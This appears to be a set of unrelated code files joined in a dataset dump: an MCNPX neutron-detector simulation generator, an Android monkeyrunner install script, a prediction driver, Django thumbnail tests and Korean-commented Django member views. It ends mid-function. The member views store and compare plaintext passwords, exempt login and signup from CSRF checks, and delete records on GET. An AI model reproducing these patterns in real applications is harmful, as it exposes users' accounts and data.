self.material['Moderator'] = {'name':'HDPE','mt':456, 'rho': 0.93} # HPDE
# Cell and Surface Inital Numbering
self.CellStartNum = 600
self.SurfaceStartNum = 600
self.ZeroSurfaceNum = 500
self.UniverseNum = 200
self.surfGeo = None
self.inp = inp
self.name = 'OUT_'+self.inp.strip('.mcnp')+'.'
self.setMaterial(0.1,'PS')
def __str__(self):
s = '\tMCNPX Model of Wrapped Cylinder\n'
s += '\t Cell Number Starts: {0:d}\n'.format(self.CellStartNum)
s += '\t Surface Number Starts: {0:d}\n'.format(self.SurfaceStartNum)
return s
def getInteractionRate(self):
""" Returns the interaction rate """
m = mctal.MCTAL(self.name+'.m')
t = m.tallies[4]
# Returing the total
return t.data[-1],t.errors[-1]
def setMaterial(self,massFraction,polymer):
"""
Sets the detector material
"""
M = Materials()
num = self.material['Detector']['mt']
if polymer == 'PS':
self.material['Detector']['matString'] = M.GetPSLiF(massFraction,num)
elif polymer == 'PEN':
self.material['Detector']['matString'] = M.GetPENLiF(massFraction,num)
else:
raise ValueError('Polymer {} is not in the material database'.format(polymer))
def createSurfaceGeo(self):
"""
Creates a dictionary of surface positions and cylinders
"""
self.surfGeo = dict()
r = self.geoParam['CylinderLightGuideRadius']
self.surfGeo[r] = 'LightGuide'
#self.material = {'Moderator':None,'Detector':None,'LightGuide':None}
while(r + self.geoParam['DetectorThickness'] < self.geoParam['CylinderRadius']):
r += self.geoParam['DetectorThickness']
self.surfGeo[r] = 'Detector'
r += self.geoParam['DetectorSpacing']
if (r < self.geoParam['CylinderRadius']):
self.surfGeo[r] = 'LightGuide'
return self.surfGeo
def calculateDetectorArea(self):
"""
Calculates the area used in a detector
"""
area = 0.0
r = self.geoParam['CylinderLightGuideRadius']
while(r + self.geoParam['DetectorThickness'] < self.geoParam['CylinderRadius']):
area -= math.pow(r,2)
r += self.geoParam['DetectorThickness']
area += math.pow(r,2)
r += self.geoParam['DetectorSpacing']
return math.pi*area
def createDetectorCylinder(self,uNum=1):
"""
Creates a detector cylinder
Returns an ntuple of s,c,detectorCells
s - the surface string
c - the cell string
detectorCells - a list of the numbers corresponding to the detectors cells
"""
cellsCreated = 0
sNum = self.SurfaceStartNum
cNum = self.CellStartNum
detectorCells = list()
s = '{:5d} rcc 0 0 0 0 0 217.7 {}\n'.format(self.SurfaceStartNum,self.geoParam['CylinderRadius'])
c = ''
keyList = sorted(self.surfGeo.keys(), key = lambda x: float(x))
for key in keyList:
sPrev = sNum
sNum += 1
cNum += 1
s += self.surfForStr.format(sNum,key)
m = self.material[self.surfGeo[key]]
if cNum == self.CellStartNum+1:
c+= '{:5d} {:d} -{:4.3f} -{:d} u={:d}\n'.format(cNum,m['mt'],m['rho'],sNum,uNum)
else:
c += self.cellForStr.format(cNum,m['mt'],m['rho'],sPrev,sNum,uNum)
# List of cells for the detector
if self.surfGeo[key] is 'Detector':
detectorCells.append(cNum)
cellsCreated += 1
# Last cell up to universe boundary
m = self.material['Moderator']
c += '{:5d} {:d} -{:4.3f} {:d} u={:d}\n'.format(cNum+1,m['mt'],m['rho'],sNum,uNum)
cellsCreated += 1
return s,c,detectorCells,cellsCreated
def runModel(self):
"""
Runs the Model by submission to Tourqe / Maui
"""
qsub= subprocess.check_output('which qsub',shell=True).strip()
cmd = '#!/bin/bash\n'
cmd += '#PBS -N {0}\n#PBS -V\n#PBS -q gen1\n#PBS -l nodes=1:ppn=1\n'
cmd += 'cd $PBS_O_WORKDIR\nmpirun mcnpx inp={1} name={2}\n'
job = cmd.format('Job_RPMCylinder',self.inp,self.name)
with open('qsub','w') as o:
o.write(job)
subprocess.call(qsub+' qsub',shell=True)
subprocess.call('rm qsub',shell=True)
def createInputDeck(self,cylinderPositions,inp=None,name=None):
""" createInputDeck
Creates an input deck of the given geometry
"""
self.inp = inp
self.name = name
if not inp:
self.inp = 'INP_Cylinder.mcnp'
if not name:
self.name = 'OUT_Cylinder.'
oFile = self.inp
# Problem Constants
cellString = 'c ------------------------- Source ----------------------------------------\n'
cellString += '70 5 -15.1 -70 $ 252Cf source \n'
cellString += '71 406 -11.34 -71 70 $ Lead around source\n'
cellString += '72 456 -0.93 -72 71 $ Poly around source\n'
surfString = 'c ########################### Surface Cards ##############################\n'
surfString += 'c ------------------- Encasing Bounds (Size of RPM8) ---------------------\n'
surfString += '500 rpp 0 12.7 -15.25 15.25 0 217.7 \n'
# Add in other cells here
numCells = 4 # 3 Source, 1 RPM8 Encasing
##################################################################
# Add in Detector Cells and Surfaces #
##################################################################
universeNum = 1
(s,c,detectorCells,cellsCreated) = self.createDetectorCylinder(universeNum)
surfString += s
cellString += 'c ------------------- Detector Cylinder Universe ------------------------\n'
cellString += c
transNum = 1
uCellNum = self.UniverseNum
transString = ''
cellString += 'c ----------------------- Detector Universe ----------------------------\n'
for pos in cylinderPositions:
transString += self.tranForStr.format(transNum,pos[0],pos[1])
cellString += '{:5d} 0 -{:d} trcl={:d} fill={:d}\n'.format(uCellNum,self.SurfaceStartNum,transNum,universeNum)
transNum +=1
uCellNum +=1
# Adding the PMMA Moderator Block
m = self.material['Moderator']
cellString += 'c ------------------------- HDPE Moderator -----------------------------\n'
cellString += '{:5d} {:d} -{:4.3f} -{:d} '.format(500,m['mt'],m['rho'],self.ZeroSurfaceNum)
cellString += ''.join('#{:d} '.format(i) for i in range(self.UniverseNum,uCellNum))
cellString += '\n'
# Getting total number of cells
numCells += cellsCreated + uCellNum-self.UniverseNum +1
##################################################################
# Write the Tallies #
##################################################################
univCells = range(self.UniverseNum,uCellNum)
tallyString = 'c ------------------------- Tallies Yo! -----------------------------------\n'
tallies = {'F54:n':{'cells':detectorCells,'comments':'FC54 6Li Reaction Rates\n',
'options':' T\nSD54 1 {0:d}R\nFM54 -1 3 105'}}
for t in tallies:
# Getting a list of cells
tallyString += tallies[t]['comments']
tallyString += str(t)+' '
j = 0
for u in univCells:
cell = list('('+str(c)+'<'+str(u)+') ' for c in tallies[t]['cells'])
cell = [cell[i:i+6] for i in range(0,len(cell),6)]
if j > 0:
tallyString += ' '+''.join(''.join(i)+'\n' for i in cell)
else:
tallyString += ' '.join(''.join(i)+'\n' for i in cell)
j +=1
tallyString = tallyString.rstrip()
tallyString += tallies[t]['options'].format(len(univCells)*len(tallies[t]['cells']))
tallyString+='\n'
# Finish up the problem data
cellString += 'c ---------------------- Detector Encasing ------------------------------\n'
cellString += '700 488 -7.92 701 -700 $ SS-316 Encasing \n'
cellString += 'c -------------------------- Outside World -------------------------------\n'
cellString += '1000 204 -0.001225 -1000 700 #70 #71 #72 $ Atmosphere \n'
cellString += '1001 0 1000 \n'
surfString += 'c ------------------------ Encasing Material -----------------------------\n'
surfString += '700 rpp -0.3175 13.018 -15.5675 15.5675 -0.3175 218.018 \n'
surfString += '701 rpp 0.0 12.7 -15.25 15.25 0.0 217.7 \n'
surfString += 'c -------------- Source --------------------------------------------------\n'
surfString += '70 s -200 0 108.85 2.510E-04 $ Source \n'
surfString += '71 s -200 0 108.85 5.0025E-01 $ 0.5 cm lead surrounding source \n'
surfString += '72 s -200 0 108.85 3.00025 $ 2.5 cm poly surrounding source \n'
surfString += 'c -------------- Outside World -------------------------------------------\n'
surfString += '1000 so 250 \n'
matString = 'c -------------------------- Material Cards -----------------------------\n'
matString += self.material['Detector']['matString']
matString += self.getMaterialString()
with open(oFile,'w') as o:
o.write('MCNPX Simulation of RPM8 Cylinder\n')
o.write(cellString)
o.write('\n')
o.write(surfString)
o.write('\n')
o.write(self.getRunString().format(numCells))
o.write(self.getSrcString())
o.write(tallyString)
o.write(matString)
o.write(transString)
o.write('\n')
def getRunString(self):
runString ='c ------------------------------ Run Info ---------------------------------\n'
runString +='nps 1E6 \n'
runString +='IMP:N 1 {0:d}R 0 $ Particle Importances within cells \n'
runString +='c -------------- Output --------------------------------------------------\n'
runString +='PRDMP j j 1 $ Write a MCTAL File \n'
runString +='PRINT 40 \n'
runString +='c ------------------------------ Physics ---------------------------------\n'
runString +='MODE N \n'
runString +='PHYS:N 100 4j -1 2 \n'
runString +='CUT:N 2j 0 0 \n'
return runString
def getSrcString(self):
"""
Returns the MCNPX formated source string
"""
srcString = 'c -------------------------- Source Defination ----------------------------\n'
srcString += 'c 1 nanogram Cf-252 source = 1E-9 grams = 6.623E-11 cc \n'
srcString += 'sdef pos=-200 0 108.85 cel=70 par=SF rad=d1 \n'
srcString += 'si1 0 2.510E-04 \n'
srcString += 'sp1 -21 1 \n'
return srcString
def getMaterialString(self):
"""
Returns the MCNXP material string
"""
matString = 'm10 1001.70c -0.080538 $Lucite (PMMA / Plexiglass) rho = 1.19 g/cc\n'
matString += ' 6012.70c -0.599848 8016.70c -0.319614 \n'
matString += 'm204 7014.70c -0.755636 $air (US S. Atm at sea level) rho = 0.001225 \n'
matString += ' 8016.70c -0.231475 18036.70c -3.9e-005 18038.70c -8e-006\n'
matString += ' 18040.70c -0.012842 \n'
matString += 'm5 98252.66c 1 $ Cf-252, rho =15.1 g/cc wiki \n'
matString += 'm406 82204.70c -0.013781 $Lead, \n'
matString += ' 82206.70c -0.239557 82207.70c -0.220743 82208.70c -0.525919\n'
matString += 'm456 1001.70c -0.143716 $Polyethylene - rho = 0.93 g/cc \n'
matString += ' 6000.70c -0.856284 \n'
matString += 'm488 14028.70c -0.009187 $Steel, Stainless 316 rho = 7.92 \n'
matString += ' 14029.70c -0.000482 14030.70c -0.000331 24050.70c -0.007095\n'
matString += ' 24052.70c -0.142291 24053.70c -0.016443 24054.70c -0.004171\n'
matString += ' 25055.70c -0.02 26054.70c -0.037326 26056.70c -0.601748\n'
matString += ' 26057.70c -0.014024 26058.70c -0.001903 28058.70c -0.080873\n'
matString += ' 28060.70c -0.031984 28061.70c -0.001408 28062.70c -0.004546\n'
matString += ' 28064.70c -0.001189 42092.70c -0.003554 42094.70c -0.002264\n'
matString += ' 42095.70c -0.003937 42096.70c -0.004169 42097.70c -0.002412\n'
matString += ' 42098.70c -0.006157 42100.70c -0.002507 \n'
matString += 'mt3 poly.01t \n'
matString += 'mt456 poly.01t \n'
matString += 'mt10 poly.01t \n'
return matString
def run(loading,polymers):
"""
Runs a matrix of loading and polymers
"""
cylinderPositions = ((4.23,10.16),(4.23,-10.16))
cylinderPositions = ((4.23,7.625),(4.23,0),(4.23,-7.625))
cylinderPositions = ((4.23,9.15),(4.23,3.05),(4.23,-3.05),(4.23,-9.15))
cylinderPositions = ((4.23,10.16),(4.23,5.08),(4.23,0.0),(4.23,-5.08),(4.23,-10.16))
for l in loading:
for p in polymers:
RunCylinder(l,p,cylinderPositions)
def RunCylinder(l,p,cylinderPositions):
"""
Runs an mcnpx model of the cylinder of loading l, polymer p, with
cylinder positions cylinderPositions.
Keywords:
l - loading of the films
p - polymer
cylinderPositions - the cylinder positons
"""
# Creating input and output deck names
posString = ''
for pos in cylinderPositions:
posString += '{:2.1f}-'.format(pos[0])
posString = posString.rstrip('-')
inp='Cyl_{}LiF_{}_{}.mcnp'.format(int(l*100),p,posString)
name='OUTCyl_{}LiF_{}_{}.'.format(int(l*100),p,posString)
print inp
# Creating and running the model
m = CylinderRPM()
m.createSurfaceGeo()
m.setMaterial(l,p)
m.createDetectorCylinder()
m.createInputDeck(cylinderPositions,inp,name)
m.runModel()
def CreatePositions(yPos,numXPertubations):
"""
Creates and returns an array of positions, using a set array of y
positions, with equally spaced number of numXPertubations.
Keywords:
yPos - the number of y positions (or spacing of the cylinders). The
number of elements in this array corresponds to the number of
cylinders that are simulated.
numXPertubations - the number of pertubations in x. The arrays
positions returned are spaced linerly in the x from 2.54 to
10.16 cm
"""
pos = list()
xVals = np.linspace(2.54,10,numXPertubations)
xPos = [i for i in itertools.product(xVals,repeat=len(yPos))]
for x in xPos:
pos.append(zip(x,yPos))
return pos
def PositionOptimization(loading,polymers,positions):
"""
Runs a matrix of loading, polymers and positions
"""
for l in loading:
for p in polymers:
for pos in positions:
RunCylinder(l,p,pos)
def createInputPlotDecks():
positions = list()
positions.append(((4.23,10.16),(4.23,-10.16)))
positions.append(((4.23,7.625),(4.23,0),(4.23,-7.625)))
#positions.append(((4.23,9.15),(4.23,3.05),(4.23,-3.05),(4.23,-9.15)))
for pos in positions:
m = CylinderRPM()
m.createSurfaceGeo()
m.createDetectorCylinder()
inp='Cylinder_{}.mcnp'.format(len(pos))
name='OUTCylinder_{}.'.format(len(pos))
m.createInputDeck(pos,inp,name)
def computeMassLi(polymer,loading,density=1.1):
"""
Computes the mass of Li for a given polymer and loading
"""
M = Materials()
m = CylinderRPM()
area = m.calculateDetectorArea()
massLi = area*217.0*M.GetLiMassFraction(loading,polymer)*density
return massLi
def extractRunInfo(filename):
"""
Extracts the loading and polymer from the file name
"""
tokens = filename.split('_')
loading = tokens[1].strip('LiF')
polymer = tokens[2].strip('.m')
return (float(loading)/100, polymer)
###########################################################################
# #
# Summerizes / Analysis #
# #
###########################################################################
def GetInteractionRate(f,tallyNum=54,src=2.3E3):
"""
Returns the interaction rate of the mctal file
"""
m = mctal.MCTAL(f)
t = m.tallies[tallyNum]
return (t.data[-1]*src,t.errors[-1]*t.data[-1]*src)
import glob
def summerize():
files = glob.glob('OUTCylinder*.m')
s = 'Polymer, loading, mass Li, count rate, error, count rate per mass\n'
for f in files:
runParam = extractRunInfo(f)
massLi = computeMassLi(runParam[1],runParam[0])
countRate = GetInteractionRate(f)
s += '{}, {:5.2f} , {:5.3f} , {:5.3f} , {:4.2f} , {:5.3f}\n'.format(runParam[1].ljust(7),runParam[0],massLi,countRate[0],countRate[1],countRate[0]/massLi)
print s
def OptimizationSummary(path):
"""
Summerizes the Optimization Output
"""
# Getting the files
if not os.path.isdir(path):
raise IOError('Path {} is not found'.format(path))
files = glob.glob(path+'/*.m')
if not files:
print 'No files matched the pattern'
return
# Parsing the files
data = dict()
for f in files:
name = os.path.splitext(os.path.split(f)[1])[0]
data[name] = GetInteractionRate(f)
# Max value
sortedKeys = sorted(data, key=data.get,reverse=True)
#sortedKeys = sorted(data.items(), key=lambda x : float(x[1][0]),reverse=True)
for key in sortedKeys[0:9]:
print '{} -> {:5.2f} +/- {:5.2f}'.format(key,data[key][0],data[key][1])
for key in sortedKeys[-6:-1]:
print '{} -> {:5.2f} +/- {:5.2f}'.format(key,data[key][0],data[key][1])
def cleanup(path):
files = glob.glob(path+'/OUTCyl_*.m')
for f in files:
head,tail = os.path.split(f)
numCylinders = tail.count('-')+1
if numCylinders == 3:
newdir = 'ThreeCylPosOpt'
elif numCylinders == 4:
newdir = 'FourCylPosOpt'
elif numCylinders == 5:
newdir = 'FiveCylPosOpt'
os.rename(f,os.path.join(newdir,tail))
###########################################################################
# #
# MAIN #
# #
###########################################################################
import argparse
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('-r','--run',action="store_true",
default=False,help='Runs the cylinders for multiple polymers and precent loadings')
parser.add_argument('-p','--plot',action="store_true",
default=False,help='Creates input decks for plotting')
parser.add_argument('-c','--clean',action="store_true",
default=False,help='Cleans up the files')
parser.add_argument('-a','--analysis',action="store_true",default=False,help="Analyze the results")
parser.add_argument('path', nargs='?', default='CylPosOpt',help='Specifiy the output directory to summerize')
parser.add_argument('-o','--optimize',action='store',type=int,default=-1,help='Run a number of optimizations on the positions. If 0 is entered a summary is preformed on the directory provided with path')
parser.add_argument('loading',metavar='loading',type=float,nargs='*',action="store",default=(0.1,0.2,0.3),help='Precent Loading of LiF')
args = parser.parse_args()
if args.run:
run(args.loading,('PS','PEN'))
if args.plot:
createInputPlotDecks()
if args.optimize > 0:
yPos = (7.625,0,-7.625)
yPos = (9.15,3.05,-3.05,-9.15)
#yPos = (10.16,5.08,0.0,-5.08,-10.16)
pos = CreatePositions(yPos,args.optimize)
loading = (0.3,)
polymers = ('PS',)
PositionOptimization(loading,polymers,pos)
if args.optimize == 0:
OptimizationSummary(args.path)
if args.analysis:
summerize()
if args.clean:
cleanup(os.getcwd())
|
994,939 | 7c8f3bc23919d7d3a66676130914f0a38feb095f | # -*-coding:utf-8 -*-
# File :kaoyanbang.py
# Author:George
# Date : 2019/10/21
# motto: Someone always give up while someone always try!
from com.android.monkeyrunner import MonkeyRunner as mr
from com.android.monkeyrunner import MonkeyDevice as md
print("Connect devices...")
device = mr.waitForConnection()
print("Install app...")
device.installPackage(r"F:\Appium\App\kaoyan3.1.0.apk")
print("Launch app...")
package = 'com.tal.kaoyan'
activity = 'com.tal.kaoyan.ui.activity.SplashActivity'
runComponent = package + '/' + activity
device.startActivity(component=runComponent) |
994,940 | d58044c24104f49dd084d32e0659c8676c2dfe6c | import Parser
import Processor
import Plot
import numpy as np
#Parse log files
julLogFile = "../data/in/access_log_Jul95"
augLogFile = "../data/in/access_log_Aug95"
#Parser.proccessLog(julLogFile, augLogFile)
#Load data
timeWindow = 60
batchSize = 10
file = "../data/out/data_"+str(timeWindow)+"min.csv"
data = np.loadtxt(file, dtype=str, delimiter=",", skiprows=1)
reWPredicted = Processor.runReW(data, timeWindow, batchSize)
cReWPredicted = Processor.runCReW(data, timeWindow, batchSize)
knnPredicted = Processor.runKNN(file, timeWindow, batchSize)
svmPredicted = Processor.runSVM(data, timeWindow, batchSize)
Plot.zoom(data, reWPredicted[0], cReWPredicted[0],knnPredicted[0], svmPredicted[0], timeWindow)
|
994,941 | 0a4a68e76564c6a694a0a5a3854ffd7558a7a489 | import responses
from django.test import TestCase
from apps.utils.video import VideoHelper
class VideoHelperTestCase(TestCase):
def test_youtube_thumbnail(self):
url = 'https://www.youtube.com/watch?v=Google123'
thumbnail = VideoHelper(url).thumbnail
self.assertEqual(thumbnail, 'http://img.youtube.com/vi/Google123/default.jpg')
@responses.activate
def test_rutube_thumbnail(self):
responses.add(responses.GET, 'http://rutube.ru/api/video/6fd81c1c212c002673280850a1c56415/',
body=open('fixtures/json/rutube.json').read())
url = 'http://rutube.ru/video/6fd81c1c212c002673280850a1c56415/'
thumbnail = VideoHelper(url).thumbnail
self.assertEqual(thumbnail, 'http://pic.rutube.ru/video/3f/79/3f7991857b0ae5621684681640b0865d.jpg')
@responses.activate
def test_vimeo_thumbnail(self):
responses.add(responses.GET, 'http://vimeo.com/api/v2/video/55028438.json',
body=open('fixtures/json/vimeo.json').read())
url = 'http://vimeo.com/55028438'
thumbnail = VideoHelper(url).thumbnail
self.assertEqual(thumbnail, 'http://i.vimeocdn.com/video/481108654_200x150.jpg')
|
994,942 | d4d5991e35f5580b895caa136ff004dbc0d607f8 | ## 서버 구동방법
# ``` $ python manage.py migrate```
# ``` $ python manage.py runserver```
# 끄는방법은 다음과 같다.
# ``` $ docker stop oracle12c
# ``` $ docker-machine stop```
from django.shortcuts import render, redirect
from django.http import HttpResponse
from django.views.decorators.csrf import csrf_exempt
### DB 연결
from django.db import connection
cursor = connection.cursor()
# 모델거치지 않고 sql-DB 바로 연결시 connection필요
# cursor 사용
from django.contrib.auth.models import User
from django.contrib.auth import authenticate as auth1
from django.contrib.auth import login as login1
from django.contrib.auth import logout as logout1
# django에서 제공하는 User 사용
from .models import Table2 # models.py파일의 Table2클래스
from django.db.models import Sum, Max, Min, Count, Avg
import pandas as pd
import matplotlib.pyplot as plt
import io # byte로 변환
import base64 #byte를 base64로 변경
from matplotlib import font_manager, rc # 한글폰트 적용
####실습 시작######################################
def exam_select(request):
if request.method == 'GET':
txt = request.GET.get('txt', '')
page = int(request.GET.get('page', 1))
# 1 -> 0, 10 게시물
# 2 -> 11, 20
if txt=='':
list = Table2.objects.all() [page*10-10:page*10]
# SELECT*FROM MEMBER_TABLE2
cnt = Table2.objects.all().count()
# SELECT COUNT(*) FROM MEMBER_TABLE2
tot = (cnt-1)//10+1
else:
list = Table2.objects.filter(name__contains=txt)[page*10-10:page*10]
# SELECT*FROM MEMBER_TABLE2 WHERE name LIKE '%가%'
cnt = Table2.objects.filter(name__contains=txt).count()
# SELECT COUNT(*)FROM MEMBER_TABLE2 WHERE name LIKE '%가%'
tot = (cnt-1)//10+1
return render(request, 'member/exam_select.html', \
{'list':list, 'pages':range(1,tot+1,1),'page_html':page}) # 파라미터 괄호하나에만
# 반별 국어, 영어, 수학 합계
# list = Table2.objects.aggregate(Sum('math'))
# # SELECT SUM(math) FROM MEMBER_TABLE2
# # WHERE CLASS_ROOM=101
# list = Table2.objects.all().values(['no', 'name'])
# # SELECT NO, NAME FROM MEMBER_TABLE2
# list = Table2.objects.all().order_by('name')
# # 복잡한 SELECT은 다음과 같이 raw 안에 SQL문을 넣어 구현
# list = Table2.objects.raw("SELECT*FROM MEMBER_TABLE2 ORDER BY name ASC")
# list = Table2.objects.values('classroom').annotate(kor=Sum('kor'), eng=Sum('eng'), math=Sum('math'))
# # SELECT
# # SUM(kor) AS kor,
# # SUM(eng) AS eng,
# # SUM(math) AS math
# # FROM MEMBER_TABLE2
# return render(request, 'member/exam_select.html',{"list":list})
def exam_insert(request):
if request.method == 'GET':
return render(request,'member/exam_insert.html',{'cnt':range(1,21)})
elif request.method=='POST':
no = request.POST.getlist('no[]')
na = request.POST.getlist('name[]')
ko = request.POST.getlist('kor[]')
en = request.POST.getlist('eng[]')
ma = request.POST.getlist('math[]')
cl = request.POST.getlist('classroom[]')
objs= []
print(na)
print('길이:', len(na))
print('길이:', len(ko))
print('길이:', len(objs))
for i in range(0, len(na), 1):
obj = Table2()
obj.name = na[i]
obj.kor = ko[i]
obj.eng = en[i]
obj.math = ma[i]
obj.classroom = cl[i]
objs.append(obj)
Table2.objects.bulk_create(objs)
return redirect('/member/exam_select')
def exam_update(request):
if request.method == 'GET':
n = request.session['no']
#n = request.POST.get('no') #한개
rows = Table2.objects.filter(no__in=n)
return render(request, 'member/exam_update.html', {'list':rows})
elif request.method == 'POST':
menu = request.POST['menu']
if menu == "list":
no = request.POST.getlist('chk[]')
request.session['no'] = no
return redirect('/member/exam_update')
elif menu == "update":
print("=================================================")
no = request.POST.getlist('no[]')
name = request.POST.getlist('name[]')
kor = request.POST.getlist('kor[]')
eng = request.POST.getlist('eng[]')
math = request.POST.getlist('math[]')
classroom = request.POST.getlist('classroom[]')
objs=[]
for i in range(0, len(no), 1):
obj = Table2.objects.get(no=no[i])
obj.name = name[i]
obj.kor = kor[i]
obj.eng = eng[i]
obj.math = math[i]
obj.classroom = classroom[i]
objs.append(obj)
Table2.objects.bulk_update(objs, ['name', 'kor', 'eng', 'math', 'classroom'])
return redirect('/member/exam_select')
else:
return redirect('/board/list') # 엉뚱한곳으로 보내서 뭐가 잘못되었는지 파악가능
def exam_delete(request):
if request.method == 'GET':
n = request.GET.get('no', 0)
p = request.GET.get('page', 1)
row = Table2.objects.get(no=n)
row.delete()
return redirect('/member/exam_select?page='+p)
####실습 끝####################################
def auth_pw(request):
if request.method == 'GET':
if not request.user.is_authenticated:
return redirect('/member/auth_login')
return render(request, 'member/auth_pw.html')
elif request.method == "POST":
pw = request.POST['pw']
pw1 = request.POST['pw1']
obj = auth1(request, username=request.user, password=pw)
if obj:
obj.set_password(pw1)
obj.save()
return redirect('/member/auth_index')
return redirect('/member/auth_pw')
def auth_edit(request):
if request.method == 'GET':
if not request.user.is_authenticated:
return redirect('/member/auth_login')
obj = User.objects.get(username=request.user)
return render(request, 'member/auth_edit.html', {'obj':obj})
if request.method == "POST":
id = request.POST['username']
na = request.POST['first_name']
em = request.POST['email']
obj = User.objects.get(username=id)
obj.first_name = na
obj.email = em
obj.save()
return redirect('/member/auth_index')
def auth_login(request):
if request.method =="GET":
return render(request, 'member/auth_login.html')
elif request.method =='POST':
id = request.POST['username']
pw = request.POST['password']
# DB에 인증
obj = auth1(request, username=id, password=pw)
if obj is not None:
login1(request, obj) # 세션에 추가
return redirect('/member/auth_index')
return redirect('/member/auth_login')
def auth_logout(request):
if request.method == 'GET' or request.method == "POST":
# GET으로도 로그아웃=주소창에 누군가 치면 싫어도 로그아웃된다.
logout1(request) # 세션 초기화
return redirect('/member/auth_index')
@csrf_exempt
def auth_index(request):
if request.method =="GET":
return render(request, 'member/auth_index.html')
@csrf_exempt
def auth_join(request):
if request.method == 'GET':
return render(request, 'member/auth_join.html')
elif request.method =='POST':
id = request.POST['username']
pw = request.POST['password']
na = request.POST['first_name']
em = request.POST['email']
obj = User.objects.create_user(
username=id,
password=pw,
first_name=na,
email=em )
obj.save()
# 회원가입
# import
# obj = Table2(
# email=em
# username=id
# )
#
# obj = Table2() 위와 동일 결과
# obj.username=request.POST['name']
# obj.email=em
#
# obj.save()
return redirect('/member/auth_index')
def list(request):
# sql 쓴 이유 :
# 데이터가 먼저냐 화면이 먼저냐?
# GET을 쓰지 않은 이유
# ID 기준으로 오름차순으로 가져오자
sql = 'SELECT*FROM MEMBER ORDER BY ID ASC'
cursor.execute(sql) #
# cursor는 sql 실행하기위한 단위
# connection.execute를 사용해도 되지만 아직 세부단위 설정되지 않음
data = cursor.fetchall() # sql문 실행의 결과값 가져와라
print(type(data)) # 리스트
print(data)
# [(, , , ,column렬의 수 만큼 ), (row 행의 수 만큼)]
# list.html으로 넘어갈때
# list 변수에 data값을, title변수에 회원목록 문자로 해서 넘긴다.
# 단 title키의 값은 하나뿐이라 list.html에서 {{title}}가능하고
# list키의 값은 회원수만큼이므로 for문 사용했음
sql = 'SELECT*FROM MEMBER1 ORDER BY ID ASC' # vip맴버리스트 취합
cursor.execute(sql)
data2 = cursor.fetchall()
print(type(data)) # 리스트
print(data)
return render(request, 'member/list.html', {'list':data, 'list2':data2, 'title':'회원목록'})
def member(request):
request.method == 'GET'
return redirect('/member/list')
def index(request):
request.method == 'GET'
return render(request, 'member/index.html')
#return HttpResponse('index page <hr />') 처럼 하던 불편사항 개선
# django에서는 보안상 csrf가 POST 할때 필수사용됨
@csrf_exempt # POST로 값을 전달 받는곳은 필수
def join(request):
if request.method == 'GET':
return render(request, 'member/join.html')
elif request.method == 'POST':
id = request.POST['id']
na = request.POST['name']
pw = request.POST['pw']
ag = request.POST['age']
ar = [id, na, ag, pw] # list로 만듬
# sql용
# sql ='''
# INSERT INTO MEMBER(ID,NAME,AGE,PW,JOINDATE)
# VALUES (%s, %s, %s, %s, date('now'))
# '''
# oracle용
sql ='''
INSERT INTO MEMBER(ID,NAME,AGE,PW,JOINDATE)
VALUES (%s, %s, %s, %s, SYSDATE)
'''
cursor.execute(sql, ar) # 위 sql 에 ar리스트를 순서대로 넣어라.그래서 서로 동일순.
# 다만, 회원가입html에서 입력순이랑 ar순서 무관. 액셀이 아니기 때문에 값을 지정해줘야 찾아가게된다.
return redirect('/member/member')
# 크롬에서 127.0.0.1:8000/member/member 엔터키 동일
@csrf_exempt
def join1(request):
if request.method == "GET":
return render(request, 'member/join1.html')
elif request.method == "POST":
id = request.POST['id']
na = request.POST['name']
pw = request.POST['pw']
im = request.POST['img']
te = request.POST['tel']
em = request.POST['email']
ar = [id, pw, na, em, te, im]
sql = '''
INSERT INTO MEMBER1(ID, PW, NAME, EMAIL, TEL, IMG, JOINDATE)
VALUES (%s, %s, %s, %s, %s, %s, SYSDATE)
'''
cursor.execute(sql, ar)
return redirect('/member/member')
@csrf_exempt
def edit(request):
if request.method == "GET":
ar = [request.session['userid']]
sql = '''
SELECT *
FROM MEMBER
WHERE ID=%s
'''
# WHERE 는 if 문(ID는 내가 넘겨주는값이 스트링으로 동일할때)
cursor.execute(sql, ar)
data=cursor.fetchone()
print(data)
return render(request, 'member/edit.html', {'one':data})
elif request.method == 'POST':
ar = [
request.POST['name'],
request.POST['age'],
request.POST['id']
]
sql = '''
UPDATE MEMBER SET NAME=%s, AGE=%s
WHERE ID = %s
'''
cursor.execute(sql, ar)
return redirect('/member/index')
@csrf_exempt
def login(request):
if request.method == 'GET':
print('loginGET')
return render(request, 'member/login.html')
elif request.method == 'POST':
print('loginPOST')
ar = [request.POST['id'], request.POST['pw']]
sql = '''
SELECT ID, NAME
FROM MEMBER
WHERE ID=%s AND PW=%s
'''
# *은 모두 가져오기. 가져올 때 순서대로
# SELECT*FROM MEMBER WHERE ID=%s AND PW=%s
cursor.execute(sql, ar)
data = cursor.fetchone()
print(type(data))
print(data)
if data:
request.session['userid'] =data[0]
request.session['username'] =data[1]
for key, value in request.session.items():
print('키값은{} 이고 밸류는{}이다'.format(key, value))
return redirect('/member/index')
# 세션.
# 암호는 가져오면 보안에 취약.
print('로그인실패')
return redirect('/member/index')
@csrf_exempt
def logout(request):
if request.method == 'GET' or request.method== 'POST':
del request.session['userid']
del request.session['username']
return redirect('/member/index')
@csrf_exempt
def delete(request):
if request.method == 'GET'or request.method== 'POST':
ar = [request.session['userid']]
sql = 'DELETE FROM MEMBER WHERE ID=%s'
cursor.execute(sql, ar)
return redirect('/member/logout')
###################
def js_index(request):
if request.method=="GET":
return render(request, 'member/js_index.html')
def js_chart(request):
if request.method=="GET":
return render(request, 'member/js_chart.html')
# def dataframe(request):
# #1. QuerySet -> list로 변경
# rows = list(Table2.objects.all().values("no", 'name', 'kor'))[0:10]
# # rows = Table2.objects.all() # = SELECT * FROM MEMBER_TABLE2
# # SELECT NO,NAME,KOR FROM MEMBER_TABLE2
# # [{'no': 260, 'name': '멍뭉이0', 'kor': 0}, ...]
# # 2. list->dataframe으로 변경 ***전처리***
# df = pd.DataFrame(rows)
# # 표로 바뀜
# # 3. dataframe -> list
# rows1 = df.values.tolist()
# # [['no': 260, 'name': '멍뭉이0', 'kor': 0], ...]
# return render(request, 'member/dataframe.html',\
# {"df_table":df.to_html(), "list":rows})
def graph(request):
# 연습용 코드들
# sum_kor = Table2.objects.aggregate(Sum('kor'))
# sum_eng = Table2.objects.aggregate(Sum('eng'))
# sum_math = Table2.objects.aggregate(Sum('math'))
# # SELECT SUM('kor') FROM MEMBER_TABLE2
# print(sum_kor)
# print('---------------------------------------------')
# print(sum_eng)
# print('---------------------------------------------')
# print(sum_math)
# print(type(sum_math))
